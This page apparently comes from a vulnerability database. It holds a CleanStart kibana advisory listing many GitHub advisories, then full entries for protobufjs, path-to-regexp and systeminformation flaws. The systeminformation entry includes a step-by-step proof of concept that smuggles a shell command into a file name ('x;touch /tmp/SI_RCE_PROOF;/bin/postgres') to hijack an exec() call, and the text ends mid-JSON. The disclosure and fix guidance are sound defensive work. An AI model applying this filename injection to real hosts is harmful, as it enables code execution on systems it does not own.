Action not permitted
Modal body text goes here.
Modal Title
Modal Body
Vulnerability from cleanstart
Multiple security vulnerabilities affect the kibana package. These issues are resolved in later releases. See references for individual vulnerability details.
{
"affected": [
{
"package": {
"ecosystem": "CleanStart",
"name": "kibana"
},
"ranges": [
{
"events": [
{
"introduced": "0"
},
{
"fixed": "9.3.2-r3"
}
],
"type": "ECOSYSTEM"
}
]
}
],
"credits": [],
"database_specific": {},
"details": "Multiple security vulnerabilities affect the kibana package. These issues are resolved in later releases. See references for individual vulnerability details.",
"id": "CLEANSTART-2026-ML12367",
"modified": "2026-05-21T06:39:47Z",
"published": "2026-05-21T08:09:24.246960Z",
"references": [
{
"type": "ADVISORY",
"url": "https://github.com/cleanstart-dev/cleanstart-security-advisories/tree/main/advisories/2026/CLEANSTART-2026-ML12367.json"
},
{
"type": "WEB",
"url": "https://osv.dev/vulnerability/ghsa-2328-f5f3-gj25"
},
{
"type": "WEB",
"url": "https://osv.dev/vulnerability/ghsa-2w6w-674q-4c4q"
},
{
"type": "WEB",
"url": "https://osv.dev/vulnerability/ghsa-3644-q5cj-c5c7"
},
{
"type": "WEB",
"url": "https://osv.dev/vulnerability/ghsa-378v-28hj-76wf"
},
{
"type": "WEB",
"url": "https://osv.dev/vulnerability/ghsa-3v7f-55p6-f55p"
},
{
"type": "WEB",
"url": "https://osv.dev/vulnerability/ghsa-48c2-rrv3-qjmp"
},
{
"type": "WEB",
"url": "https://osv.dev/vulnerability/ghsa-4rc3-7j7w-m548"
},
{
"type": "WEB",
"url": "https://osv.dev/vulnerability/ghsa-56p5-8mhr-2fph"
},
{
"type": "WEB",
"url": "https://osv.dev/vulnerability/ghsa-5m6q-g25r-mvwx"
},
{
"type": "WEB",
"url": "https://osv.dev/vulnerability/ghsa-5vv4-hvf7-2h46"
},
{
"type": "WEB",
"url": "https://osv.dev/vulnerability/ghsa-66ff-xgx4-vchm"
},
{
"type": "WEB",
"url": "https://osv.dev/vulnerability/ghsa-685m-2w69-288q"
},
{
"type": "WEB",
"url": "https://osv.dev/vulnerability/ghsa-6chq-wfr3-2hj9"
},
{
"type": "WEB",
"url": "https://osv.dev/vulnerability/ghsa-6v7q-wjvx-w8wg"
},
{
"type": "WEB",
"url": "https://osv.dev/vulnerability/ghsa-75px-5xx7-5xc7"
},
{
"type": "WEB",
"url": "https://osv.dev/vulnerability/ghsa-8gc5-j5rx-235r"
},
{
"type": "WEB",
"url": "https://osv.dev/vulnerability/ghsa-9c88-49p5-5ggf"
},
{
"type": "WEB",
"url": "https://osv.dev/vulnerability/ghsa-c2c7-rcm5-vvqj"
},
{
"type": "WEB",
"url": "https://osv.dev/vulnerability/ghsa-chqc-8p9q-pq6q"
},
{
"type": "WEB",
"url": "https://osv.dev/vulnerability/ghsa-f269-vfmq-vjvj"
},
{
"type": "WEB",
"url": "https://osv.dev/vulnerability/ghsa-f886-m6hf-6m8v"
},
{
"type": "WEB",
"url": "https://osv.dev/vulnerability/ghsa-hvx9-hwr7-wjj9"
},
{
"type": "WEB",
"url": "https://osv.dev/vulnerability/ghsa-j3q9-mxjg-w52f"
},
{
"type": "WEB",
"url": "https://osv.dev/vulnerability/ghsa-jg4p-7fhp-p32p"
},
{
"type": "WEB",
"url": "https://osv.dev/vulnerability/ghsa-jp2q-39xq-3w4g"
},
{
"type": "WEB",
"url": "https://osv.dev/vulnerability/ghsa-jvwf-75h9-cwgg"
},
{
"type": "WEB",
"url": "https://osv.dev/vulnerability/ghsa-pf86-5x62-jrwf"
},
{
"type": "WEB",
"url": "https://osv.dev/vulnerability/ghsa-ppp5-5v6c-4jwp"
},
{
"type": "WEB",
"url": "https://osv.dev/vulnerability/ghsa-q3j6-qgpj-74h6"
},
{
"type": "WEB",
"url": "https://osv.dev/vulnerability/ghsa-q67f-28xg-22rw"
},
{
"type": "WEB",
"url": "https://osv.dev/vulnerability/ghsa-q7rr-3cgh-j5r3"
},
{
"type": "WEB",
"url": "https://osv.dev/vulnerability/ghsa-r399-636x-v7f6"
},
{
"type": "WEB",
"url": "https://osv.dev/vulnerability/ghsa-r4q5-vmmm-2653"
},
{
"type": "WEB",
"url": "https://osv.dev/vulnerability/ghsa-r5fr-rjxr-66jc"
},
{
"type": "WEB",
"url": "https://osv.dev/vulnerability/ghsa-rp42-5vxx-qpwr"
},
{
"type": "WEB",
"url": "https://osv.dev/vulnerability/ghsa-rpmf-866q-6p89"
},
{
"type": "WEB",
"url": "https://osv.dev/vulnerability/ghsa-v2v4-37r5-5v8g"
},
{
"type": "WEB",
"url": "https://osv.dev/vulnerability/ghsa-v39h-62p7-jpjc"
},
{
"type": "WEB",
"url": "https://osv.dev/vulnerability/ghsa-v9p9-hfj2-hcw8"
},
{
"type": "WEB",
"url": "https://osv.dev/vulnerability/ghsa-vrm6-8vpv-qv8q"
},
{
"type": "WEB",
"url": "https://osv.dev/vulnerability/ghsa-vvjj-xcjg-gr5g"
},
{
"type": "WEB",
"url": "https://osv.dev/vulnerability/ghsa-w5hq-g745-h8pq"
},
{
"type": "WEB",
"url": "https://osv.dev/vulnerability/ghsa-wmfp-5q7x-987x"
},
{
"type": "WEB",
"url": "https://osv.dev/vulnerability/ghsa-wphj-fx3q-84ch"
},
{
"type": "WEB",
"url": "https://osv.dev/vulnerability/ghsa-xq3m-2v4x-88gg"
}
],
"related": [],
"schema_version": "1.7.3",
"summary": "Security fixes for ghsa-2328-f5f3-gj25, ghsa-2w6w-674q-4c4q, ghsa-3644-q5cj-c5c7, ghsa-378v-28hj-76wf, ghsa-3v7f-55p6-f55p, ghsa-48c2-rrv3-qjmp, ghsa-4rc3-7j7w-m548, ghsa-56p5-8mhr-2fph, ghsa-5m6q-g25r-mvwx, ghsa-5vv4-hvf7-2h46, ghsa-66ff-xgx4-vchm, ghsa-685m-2w69-288q, ghsa-6chq-wfr3-2hj9, ghsa-6v7q-wjvx-w8wg, ghsa-75px-5xx7-5xc7, ghsa-8gc5-j5rx-235r, ghsa-9c88-49p5-5ggf, ghsa-c2c7-rcm5-vvqj, ghsa-chqc-8p9q-pq6q, ghsa-f269-vfmq-vjvj, ghsa-f886-m6hf-6m8v, ghsa-hvx9-hwr7-wjj9, ghsa-j3q9-mxjg-w52f, ghsa-jg4p-7fhp-p32p, ghsa-jp2q-39xq-3w4g, ghsa-jvwf-75h9-cwgg, ghsa-pf86-5x62-jrwf, ghsa-ppp5-5v6c-4jwp, ghsa-q3j6-qgpj-74h6, ghsa-q67f-28xg-22rw, ghsa-q7rr-3cgh-j5r3, ghsa-r399-636x-v7f6, ghsa-r4q5-vmmm-2653, ghsa-r5fr-rjxr-66jc, ghsa-rp42-5vxx-qpwr, ghsa-rpmf-866q-6p89, ghsa-v2v4-37r5-5v8g, ghsa-v39h-62p7-jpjc, ghsa-v9p9-hfj2-hcw8, ghsa-vrm6-8vpv-qv8q, ghsa-vvjj-xcjg-gr5g, ghsa-w5hq-g745-h8pq, ghsa-wmfp-5q7x-987x, ghsa-wphj-fx3q-84ch, ghsa-xq3m-2v4x-88gg applied in versions: 9.3.2-r3",
"upstream": [
"ghsa-2328-f5f3-gj25",
"ghsa-2w6w-674q-4c4q",
"ghsa-3644-q5cj-c5c7",
"ghsa-378v-28hj-76wf",
"ghsa-3v7f-55p6-f55p",
"ghsa-48c2-rrv3-qjmp",
"ghsa-4rc3-7j7w-m548",
"ghsa-56p5-8mhr-2fph",
"ghsa-5m6q-g25r-mvwx",
"ghsa-5vv4-hvf7-2h46",
"ghsa-66ff-xgx4-vchm",
"ghsa-685m-2w69-288q",
"ghsa-6chq-wfr3-2hj9",
"ghsa-6v7q-wjvx-w8wg",
"ghsa-75px-5xx7-5xc7",
"ghsa-8gc5-j5rx-235r",
"ghsa-9c88-49p5-5ggf",
"ghsa-c2c7-rcm5-vvqj",
"ghsa-chqc-8p9q-pq6q",
"ghsa-f269-vfmq-vjvj",
"ghsa-f886-m6hf-6m8v",
"ghsa-hvx9-hwr7-wjj9",
"ghsa-j3q9-mxjg-w52f",
"ghsa-jg4p-7fhp-p32p",
"ghsa-jp2q-39xq-3w4g",
"ghsa-jvwf-75h9-cwgg",
"ghsa-pf86-5x62-jrwf",
"ghsa-ppp5-5v6c-4jwp",
"ghsa-q3j6-qgpj-74h6",
"ghsa-q67f-28xg-22rw",
"ghsa-q7rr-3cgh-j5r3",
"ghsa-r399-636x-v7f6",
"ghsa-r4q5-vmmm-2653",
"ghsa-r5fr-rjxr-66jc",
"ghsa-rp42-5vxx-qpwr",
"ghsa-rpmf-866q-6p89",
"ghsa-v2v4-37r5-5v8g",
"ghsa-v39h-62p7-jpjc",
"ghsa-v9p9-hfj2-hcw8",
"ghsa-vrm6-8vpv-qv8q",
"ghsa-vvjj-xcjg-gr5g",
"ghsa-w5hq-g745-h8pq",
"ghsa-wmfp-5q7x-987x",
"ghsa-wphj-fx3q-84ch",
"ghsa-xq3m-2v4x-88gg"
]
}
GHSA-685M-2W69-288Q
Vulnerability from github – Published: 2026-05-12 15:01 – Updated: 2026-05-14 20:35Summary
protobufjs could recurse without a depth limit while decoding nested protobuf data. This affected both skipping unknown group fields and generated decoding of nested message fields.
A crafted protobuf binary payload could cause the JavaScript call stack to be exhausted during decoding.
Impact
An attacker who can provide protobuf binary data decoded by an application may be able to crash the process or otherwise cause decoding to fail with a stack overflow.
This affects applications that decode untrusted protobuf binary input with affected versions.
Preconditions
- The application must decode protobuf binary data influenced by an attacker.
- The crafted input must contain deeply nested protobuf structures, such as nested group tags or nested message fields.
- The affected decoder path must process the crafted input.
Workarounds
Avoid decoding untrusted protobuf binary data with affected versions. If immediate upgrade is not possible, reject excessively nested messages at an outer protocol boundary where feasible, or isolate protobuf decoding in a process that can be safely restarted.
{
"affected": [
{
"database_specific": {
"last_known_affected_version_range": "\u003c= 7.5.5"
},
"package": {
"ecosystem": "npm",
"name": "protobufjs"
},
"ranges": [
{
"events": [
{
"introduced": "0"
},
{
"fixed": "7.5.6"
}
],
"type": "ECOSYSTEM"
}
]
},
{
"database_specific": {
"last_known_affected_version_range": "\u003c= 8.0.1"
},
"package": {
"ecosystem": "npm",
"name": "protobufjs"
},
"ranges": [
{
"events": [
{
"introduced": "8.0.0"
},
{
"fixed": "8.0.2"
}
],
"type": "ECOSYSTEM"
}
]
}
],
"aliases": [
"CVE-2026-44289"
],
"database_specific": {
"cwe_ids": [
"CWE-674"
],
"github_reviewed": true,
"github_reviewed_at": "2026-05-12T15:01:05Z",
"nvd_published_at": "2026-05-13T16:16:55Z",
"severity": "HIGH"
},
"details": "## Summary\n\nprotobufjs could recurse without a depth limit while decoding nested protobuf data. This affected both skipping unknown group fields and generated decoding of nested message fields.\n\nA crafted protobuf binary payload could cause the JavaScript call stack to be exhausted during decoding.\n\n## Impact\n\nAn attacker who can provide protobuf binary data decoded by an application may be able to crash the process or otherwise cause decoding to fail with a stack overflow.\n\nThis affects applications that decode untrusted protobuf binary input with affected versions.\n\n## Preconditions\n\n- The application must decode protobuf binary data influenced by an attacker.\n- The crafted input must contain deeply nested protobuf structures, such as nested group tags or nested message fields.\n- The affected decoder path must process the crafted input.\n\n## Workarounds\n\nAvoid decoding untrusted protobuf binary data with affected versions. If immediate upgrade is not possible, reject excessively nested messages at an outer protocol boundary where feasible, or isolate protobuf decoding in a process that can be safely restarted.",
"id": "GHSA-685m-2w69-288q",
"modified": "2026-05-14T20:35:08Z",
"published": "2026-05-12T15:01:05Z",
"references": [
{
"type": "WEB",
"url": "https://github.com/protobufjs/protobuf.js/security/advisories/GHSA-685m-2w69-288q"
},
{
"type": "ADVISORY",
"url": "https://nvd.nist.gov/vuln/detail/CVE-2026-44289"
},
{
"type": "PACKAGE",
"url": "https://github.com/protobufjs/protobuf.js"
},
{
"type": "WEB",
"url": "https://github.com/protobufjs/protobuf.js/releases/tag/protobufjs-v7.5.6"
},
{
"type": "WEB",
"url": "https://github.com/protobufjs/protobuf.js/releases/tag/protobufjs-v8.0.2"
}
],
"schema_version": "1.4.0",
"severity": [
{
"score": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H",
"type": "CVSS_V3"
}
],
"summary": "protobuf.js: Denial of service through unbounded protobuf recursion"
}
GHSA-J3Q9-MXJG-W52F
Vulnerability from github – Published: 2026-03-27 22:23 – Updated: 2026-03-27 22:23Impact
A bad regular expression is generated any time you have multiple sequential optional groups (curly brace syntax), such as {a}{b}{c}:z. The generated regex grows exponentially with the number of groups, causing denial of service.
Patches
Fixed in version 8.4.0.
Workarounds
Limit the number of sequential optional groups in route patterns. Avoid passing user-controlled input as route patterns.
{
"affected": [
{
"package": {
"ecosystem": "npm",
"name": "path-to-regexp"
},
"ranges": [
{
"events": [
{
"introduced": "8.0.0"
},
{
"fixed": "8.4.0"
}
],
"type": "ECOSYSTEM"
}
]
}
],
"aliases": [
"CVE-2026-4926"
],
"database_specific": {
"cwe_ids": [
"CWE-1333",
"CWE-400"
],
"github_reviewed": true,
"github_reviewed_at": "2026-03-27T22:23:27Z",
"nvd_published_at": "2026-03-26T19:17:08Z",
"severity": "HIGH"
},
"details": "### Impact\n\nA bad regular expression is generated any time you have multiple sequential optional groups (curly brace syntax), such as `{a}{b}{c}:z`. The generated regex grows exponentially with the number of groups, causing denial of service.\n\n### Patches\n\nFixed in version 8.4.0.\n\n### Workarounds\n\nLimit the number of sequential optional groups in route patterns. Avoid passing user-controlled input as route patterns.",
"id": "GHSA-j3q9-mxjg-w52f",
"modified": "2026-03-27T22:23:27Z",
"published": "2026-03-27T22:23:27Z",
"references": [
{
"type": "WEB",
"url": "https://github.com/pillarjs/path-to-regexp/security/advisories/GHSA-j3q9-mxjg-w52f"
},
{
"type": "ADVISORY",
"url": "https://nvd.nist.gov/vuln/detail/CVE-2026-4926"
},
{
"type": "WEB",
"url": "https://cna.openjsf.org/security-advisories.html"
},
{
"type": "PACKAGE",
"url": "https://github.com/pillarjs/path-to-regexp"
}
],
"schema_version": "1.4.0",
"severity": [
{
"score": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H",
"type": "CVSS_V3"
}
],
"summary": "path-to-regexp vulnerable to Denial of Service via sequential optional groups"
}
GHSA-XQ3M-2V4X-88GG
Vulnerability from github – Published: 2026-04-16 22:34 – Updated: 2026-05-04 22:12Summary
protobufjs could execute generated JavaScript code derived from protobuf schema metadata. When loading a crafted JSON descriptor, schema-controlled type names and type references could reach runtime code generation without sufficient validation.
Impact
An attacker who can provide a malicious protobuf definition or JSON descriptor to an application may be able to execute arbitrary JavaScript in the context of the process using protobufjs.
This requires control over the protobuf schema or descriptor being loaded. Applications that only decode messages using trusted, application-defined schemas are not directly affected by this issue.
Preconditions
- The application must allow an attacker to control or influence a protobuf definition or JSON descriptor.
- The application must load that definition through protobufjs reflection APIs such as descriptor loading.
- The affected generated-code path must be reached, for example by performing an operation on the loaded type.
Workarounds
Do not load protobuf definitions or JSON descriptors from untrusted sources with affected versions. If untrusted schemas must be accepted, validate or restrict them before loading and run schema processing in an isolated environment.
{
"affected": [
{
"package": {
"ecosystem": "npm",
"name": "protobufjs"
},
"ranges": [
{
"events": [
{
"introduced": "8.0.0"
},
{
"fixed": "8.0.1"
}
],
"type": "ECOSYSTEM"
}
]
},
{
"package": {
"ecosystem": "npm",
"name": "protobufjs"
},
"ranges": [
{
"events": [
{
"introduced": "0"
},
{
"fixed": "7.5.5"
}
],
"type": "ECOSYSTEM"
}
]
}
],
"aliases": [
"CVE-2026-41242"
],
"database_specific": {
"cwe_ids": [
"CWE-94"
],
"github_reviewed": true,
"github_reviewed_at": "2026-04-16T22:34:57Z",
"nvd_published_at": "2026-04-18T17:16:13Z",
"severity": "CRITICAL"
},
"details": "## Summary\n\nprotobufjs could execute generated JavaScript code derived from protobuf schema metadata. When loading a crafted JSON descriptor, schema-controlled type names and type references could reach runtime code generation without sufficient validation.\n\n## Impact\n\nAn attacker who can provide a malicious protobuf definition or JSON descriptor to an application may be able to execute arbitrary JavaScript in the context of the process using protobufjs.\n\nThis requires control over the protobuf schema or descriptor being loaded. Applications that only decode messages using trusted, application-defined schemas are not directly affected by this issue.\n\n## Preconditions\n\n- The application must allow an attacker to control or influence a protobuf definition or JSON descriptor.\n- The application must load that definition through protobufjs reflection APIs such as descriptor loading.\n- The affected generated-code path must be reached, for example by performing an operation on the loaded type.\n\n## Workarounds\n\nDo not load protobuf definitions or JSON descriptors from untrusted sources with affected versions. If untrusted schemas must be accepted, validate or restrict them before loading and run schema processing in an isolated environment.",
"id": "GHSA-xq3m-2v4x-88gg",
"modified": "2026-05-04T22:12:42Z",
"published": "2026-04-16T22:34:57Z",
"references": [
{
"type": "WEB",
"url": "https://github.com/protobufjs/protobuf.js/security/advisories/GHSA-xq3m-2v4x-88gg"
},
{
"type": "ADVISORY",
"url": "https://nvd.nist.gov/vuln/detail/CVE-2026-41242"
},
{
"type": "WEB",
"url": "https://github.com/protobufjs/protobuf.js/commit/535df444ac060243722ac5d672db205e5c531d75"
},
{
"type": "WEB",
"url": "https://github.com/protobufjs/protobuf.js/commit/ff7b2afef8754837cc6dc64c864cd111ab477956"
},
{
"type": "PACKAGE",
"url": "https://github.com/protobufjs/protobuf.js"
},
{
"type": "WEB",
"url": "https://github.com/protobufjs/protobuf.js/releases/tag/protobufjs-v7.5.5"
},
{
"type": "WEB",
"url": "https://github.com/protobufjs/protobuf.js/releases/tag/protobufjs-v8.0.1"
}
],
"schema_version": "1.4.0",
"severity": [
{
"score": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H",
"type": "CVSS_V3"
},
{
"score": "CVSS:4.0/AV:N/AC:L/AT:N/PR:L/UI:N/VC:H/VI:H/VA:H/SC:H/SI:H/SA:H",
"type": "CVSS_V4"
}
],
"summary": "Arbitrary code execution in protobufjs"
}
GHSA-5VV4-HVF7-2H46
Vulnerability from github – Published: 2026-02-18 22:36 – Updated: 2026-02-19 21:57Command Injection via Unsanitized locate Output in versions() — systeminformation
Package: systeminformation (npm)
Tested Version: 5.30.7
Affected Platform: Linux
Author: Sebastian Hildebrandt
Weekly Downloads: ~5,000,000+
Repository: https://github.com/sebhildebrandt/systeminformation
Severity: Medium
CWE: CWE-78 (OS Command Injection)
The Vulnerable Code Path
Inside the versions() function, when detecting the PostgreSQL version on Linux, the code does this:
// lib/osinfo.js — lines 770-776
exec('locate bin/postgres', (error, stdout) => {
if (!error) {
const postgresqlBin = stdout.toString().split('\n').sort();
if (postgresqlBin.length) {
exec(postgresqlBin[postgresqlBin.length - 1] + ' -V', (error, stdout) => {
// parses version string...
});
}
}
});
Here's what happens step by step:
- It runs
locate bin/postgresto search the filesystem for PostgreSQL binaries - It splits the output by newline and sorts the results alphabetically
- It takes the last element (highest alphabetically)
- It concatenates that path directly into a new
exec()call with+ ' -V'
No sanitizeShellString(). No path validation. No execFile(). Raw string concatenation into exec().
The locate command reads from a system-wide database (plocate.db or mlocate.db) that indexes all filenames on the system. If any indexed filename contains shell metacharacters — specifically semicolons — those characters will be interpreted by the shell when passed to exec().
Exploitation
Prerequisites
For this vulnerability to be exploitable, the following conditions must be met:
- Target system runs Linux — the vulnerable code path is inside an
if (_linux)block locate/plocateis installed — common on Ubuntu, Debian, Fedora, RHEL- PostgreSQL binary exists in the locate database — so
locate bin/postgresreturns results (otherwise the code falls through to a safepsql -Vfallback) - The attacker can create files on the filesystem — in any directory that gets indexed by
updatedb - The locate database gets updated —
updatedbruns daily via systemd timer (plocate-updatedb.timer) or cron on most distros
Step 1 — Verify the Environment
On the target machine, confirm locate is available and running:
which locate
# /usr/bin/locate
systemctl list-timers | grep plocate
# plocate-updatedb.timer plocate-updatedb.service
# (runs daily, typically around 1-2 AM)
Check who owns the locate database:
ls -la /var/lib/plocate/plocate.db
# -rw-r----- 1 root plocate 18851616 Feb 14 01:50 /var/lib/plocate/plocate.db
Database is root-owned and updated by root. Regular users cannot update it directly, but updatedb runs on a daily schedule and indexes all readable files.
Step 2 — Craft the Malicious File Path
The key insight is that Linux allows semicolons in filenames, and exec() passes strings through /bin/sh -c which interprets semicolons as command separators.
Create a file whose path contains an injected command:
mkdir -p "/var/tmp/x;touch /tmp/SI_RCE_PROOF;/bin"
touch "/var/tmp/x;touch /tmp/SI_RCE_PROOF;/bin/postgres"
Verify it exists:
find /var/tmp -name postgres
# /var/tmp/x;touch /tmp/SI_RCE_PROOF;/bin/postgres
This file needs to end up in the locate database. On a real system, this happens automatically when updatedb runs overnight. For testing purposes:
sudo updatedb
Then verify locate picks it up:
locate bin/postgres
# /usr/lib/postgresql/14/bin/postgres
# /var/tmp/x;touch /tmp/SI_RCE_PROOF;/bin/postgres
Step 3 — Understand the Sort Trick
The vulnerable code sorts the locate results alphabetically and takes the last element:
const postgresqlBin = stdout.toString().split('\n').sort();
exec(postgresqlBin[postgresqlBin.length - 1] + ' -V', ...);
Alphabetically, /var/ sorts after /usr/. So our malicious path naturally becomes the selected one:
Node.js sort order:
[0] /usr/lib/postgresql/14/bin/postgres ← legitimate
[1] /var/tmp/x;touch /tmp/SI_RCE_PROOF;/bin/postgres ← selected (last)
Quick verification:
node -e "
const paths = [
'/usr/lib/postgresql/14/bin/postgres',
'/var/tmp/x;touch /tmp/SI_RCE_PROOF;/bin/postgres'
];
console.log('Sorted:', paths.sort());
console.log('Selected (last):', paths[paths.length - 1]);
"
Output:
Sorted: [
'/usr/lib/postgresql/14/bin/postgres',
'/var/tmp/x;touch /tmp/SI_RCE_PROOF;/bin/postgres'
]
Selected (last): /var/tmp/x;touch /tmp/SI_RCE_PROOF;/bin/postgres
Step 4 — Trigger the Vulnerability
Now when any application using systeminformation calls versions() requesting the postgresql version, the injected command fires:
const si = require('systeminformation');
// This is a normal, innocent API call
si.versions('postgresql').then(data => {
console.log(data);
});
Internally, the library builds and executes this command:
/var/tmp/x;touch /tmp/SI_RCE_PROOF;/bin/postgres -V
The shell (/bin/sh -c) interprets this as three separate commands:
/var/tmp/x → fails silently (not executable)
touch /tmp/SI_RCE_PROOF → ATTACKER'S COMMAND EXECUTES
/bin/postgres -V → runs normally, returns version
Step 5 — Verify Code Execution
ls -la /tmp/SI_RCE_PROOF
# -rw-rw-r-- 1 appuser appuser 0 Feb 14 15:30 /tmp/SI_RCE_PROOF
The file exists. Arbitrary command execution confirmed.
The injected command runs with whatever privileges the Node.js process has. In a monitoring dashboard or backend API context, that's typically the application service account.
Real-World Attack Scenarios
Scenario 1 — Shared Hosting / Multi-Tenant Server
A low-privileged user on a shared server creates the malicious file in /tmp or their home directory. The hosting provider runs a monitoring agent that uses systeminformation for health dashboards. Next time the agent calls versions(), the attacker's command executes under the monitoring agent's (higher-privileged) service account.
Scenario 2 — CI/CD Pipeline Poisoning
A malicious contributor submits a PR that includes a build step creating files with crafted names. If the CI pipeline uses systeminformation for environment reporting (common in test harnesses and build dashboards), the injected commands execute in the CI runner context — potentially leaking secrets, tokens, and deployment keys.
Scenario 3 — Container / Kubernetes Escape
In containerized environments where /var or /tmp sits on a shared volume, a compromised container creates the malicious file. When the host-level monitoring agent (running systeminformation) calls versions(), the injected command executes on the host, breaking out of the container boundary.
Suggested Fix
Replace exec() with execFile() for the PostgreSQL binary version check. execFile() does not spawn a shell, so metacharacters in the path are treated as literal characters:
const { execFile } = require('child_process');
exec('locate bin/postgres', (error, stdout) => {
if (!error) {
const postgresqlBin = stdout.toString().split('\n')
.filter(p => p.trim().length > 0)
.sort();
if (postgresqlBin.length) {
execFile(postgresqlBin[postgresqlBin.length - 1], ['-V'], (error, stdout) => {
// ... parse version
});
}
}
});
Additionally, the locate output should be validated against a safe path pattern before use:
const safePath = /^[a-zA-Z0-9/_.-]+$/;
const postgresqlBin = stdout.toString().split('\n')
.filter(p => safePath.test(p.trim()))
.sort();
Disclosure
- Reported via: GitHub Private Security Advisory
- Advisory URL: https://github.com/sebhildebrandt/systeminformation/security/advisories/new
- Security Contact: security@systeminformation.io
{
"affected": [
{
"database_specific": {
"last_known_affected_version_range": "\u003c= 5.30.7"
},
"package": {
"ecosystem": "npm",
"name": "systeminformation"
},
"ranges": [
{
"events": [
{
"introduced": "0"
},
{
"fixed": "5.31.0"
}
],
"type": "ECOSYSTEM"
}
]
}
],
"aliases": [
"CVE-2026-26318"
],
"database_specific": {
"cwe_ids": [
"CWE-78"
],
"github_reviewed": true,
"github_reviewed_at": "2026-02-18T22:36:50Z",
"nvd_published_at": "2026-02-19T20:25:44Z",
"severity": "HIGH"
},
"details": "# Command Injection via Unsanitized `locate` Output in `versions()` \u2014 systeminformation\n\n**Package:** systeminformation (npm) \n**Tested Version:** 5.30.7 \n**Affected Platform:** Linux \n**Author:** Sebastian Hildebrandt \n**Weekly Downloads:** ~5,000,000+ \n**Repository:** https://github.com/sebhildebrandt/systeminformation \n**Severity:** Medium \n**CWE:** CWE-78 (OS Command Injection) \n\n---\n\n### The Vulnerable Code Path\n\nInside the `versions()` function, when detecting the PostgreSQL version on Linux, the code does this:\n\n```javascript\n// lib/osinfo.js \u2014 lines 770-776\n\nexec(\u0027locate bin/postgres\u0027, (error, stdout) =\u003e {\n if (!error) {\n const postgresqlBin = stdout.toString().split(\u0027\\n\u0027).sort();\n if (postgresqlBin.length) {\n exec(postgresqlBin[postgresqlBin.length - 1] + \u0027 -V\u0027, (error, stdout) =\u003e {\n // parses version string...\n });\n }\n }\n});\n```\n\nHere\u0027s what happens step by step:\n\n1. It runs `locate bin/postgres` to search the filesystem for PostgreSQL binaries\n2. It splits the output by newline and sorts the results alphabetically\n3. It takes the **last element** (highest alphabetically)\n4. It concatenates that path directly into a new `exec()` call with `+ \u0027 -V\u0027`\n\n**No `sanitizeShellString()`. No path validation. No `execFile()`. Raw string concatenation into `exec()`.**\n\nThe `locate` command reads from a system-wide database (`plocate.db` or `mlocate.db`) that indexes all filenames on the system. If any indexed filename contains shell metacharacters \u2014 specifically semicolons \u2014 those characters will be interpreted by the shell when passed to `exec()`.\n\n---\n\n## Exploitation\n\n### Prerequisites\n\nFor this vulnerability to be exploitable, the following conditions must be met:\n\n1. **Target system runs Linux** \u2014 the vulnerable code path is inside an `if (_linux)` block\n2. **`locate` / `plocate` is installed** \u2014 common on Ubuntu, Debian, Fedora, RHEL\n3. **PostgreSQL binary exists in the locate database** \u2014 so `locate bin/postgres` returns results (otherwise the code falls through to a safe `psql -V` fallback)\n4. **The attacker can create files on the filesystem** \u2014 in any directory that gets indexed by `updatedb`\n5. **The locate database gets updated** \u2014 `updatedb` runs daily via systemd timer (`plocate-updatedb.timer`) or cron on most distros\n\n### Step 1 \u2014 Verify the Environment\n\nOn the target machine, confirm locate is available and running:\n\n```\nwhich locate\n# /usr/bin/locate\n\nsystemctl list-timers | grep plocate\n# plocate-updatedb.timer plocate-updatedb.service\n# (runs daily, typically around 1-2 AM)\n```\n\nCheck who owns the locate database:\n\n```\nls -la /var/lib/plocate/plocate.db\n# -rw-r----- 1 root plocate 18851616 Feb 14 01:50 /var/lib/plocate/plocate.db\n```\n\nDatabase is root-owned and updated by root. Regular users cannot update it directly, but `updatedb` runs on a daily schedule and indexes all readable files.\n\n### Step 2 \u2014 Craft the Malicious File Path\n\nThe key insight is that **Linux allows semicolons in filenames**, and `exec()` passes strings through `/bin/sh -c` which **interprets semicolons as command separators**.\n\nCreate a file whose path contains an injected command:\n\n```\nmkdir -p \"/var/tmp/x;touch /tmp/SI_RCE_PROOF;/bin\"\ntouch \"/var/tmp/x;touch /tmp/SI_RCE_PROOF;/bin/postgres\"\n```\n\nVerify it exists:\n\n```\nfind /var/tmp -name postgres\n# /var/tmp/x;touch /tmp/SI_RCE_PROOF;/bin/postgres\n```\n\nThis file needs to end up in the `locate` database. On a real system, this happens automatically when `updatedb` runs overnight. For testing purposes:\n\n```\nsudo updatedb\n```\n\nThen verify locate picks it up:\n\n```\nlocate bin/postgres\n# /usr/lib/postgresql/14/bin/postgres\n# /var/tmp/x;touch /tmp/SI_RCE_PROOF;/bin/postgres\n```\n\n### Step 3 \u2014 Understand the Sort Trick\n\nThe vulnerable code sorts the locate results alphabetically and takes the **last** element:\n\n```javascript\nconst postgresqlBin = stdout.toString().split(\u0027\\n\u0027).sort();\nexec(postgresqlBin[postgresqlBin.length - 1] + \u0027 -V\u0027, ...);\n```\n\nAlphabetically, `/var/` sorts **after** `/usr/`. So our malicious path naturally becomes the selected one:\n\n```\nNode.js sort order:\n [0] /usr/lib/postgresql/14/bin/postgres \u2190 legitimate\n [1] /var/tmp/x;touch /tmp/SI_RCE_PROOF;/bin/postgres \u2190 selected (last)\n```\n\nQuick verification:\n\n```\nnode -e \"\nconst paths = [\n \u0027/usr/lib/postgresql/14/bin/postgres\u0027,\n \u0027/var/tmp/x;touch /tmp/SI_RCE_PROOF;/bin/postgres\u0027\n];\nconsole.log(\u0027Sorted:\u0027, paths.sort());\nconsole.log(\u0027Selected (last):\u0027, paths[paths.length - 1]);\n\"\n```\n\nOutput:\n\n```\nSorted: [\n \u0027/usr/lib/postgresql/14/bin/postgres\u0027,\n \u0027/var/tmp/x;touch /tmp/SI_RCE_PROOF;/bin/postgres\u0027\n]\nSelected (last): /var/tmp/x;touch /tmp/SI_RCE_PROOF;/bin/postgres\n```\n\n### Step 4 \u2014 Trigger the Vulnerability\n\nNow when any application using systeminformation calls `versions()` requesting the postgresql version, the injected command fires:\n\n```javascript\nconst si = require(\u0027systeminformation\u0027);\n\n// This is a normal, innocent API call\nsi.versions(\u0027postgresql\u0027).then(data =\u003e {\n console.log(data);\n});\n```\n\nInternally, the library builds and executes this command:\n\n```\n/var/tmp/x;touch /tmp/SI_RCE_PROOF;/bin/postgres -V\n```\n\nThe shell (`/bin/sh -c`) interprets this as three separate commands:\n\n```\n/var/tmp/x \u2192 fails silently 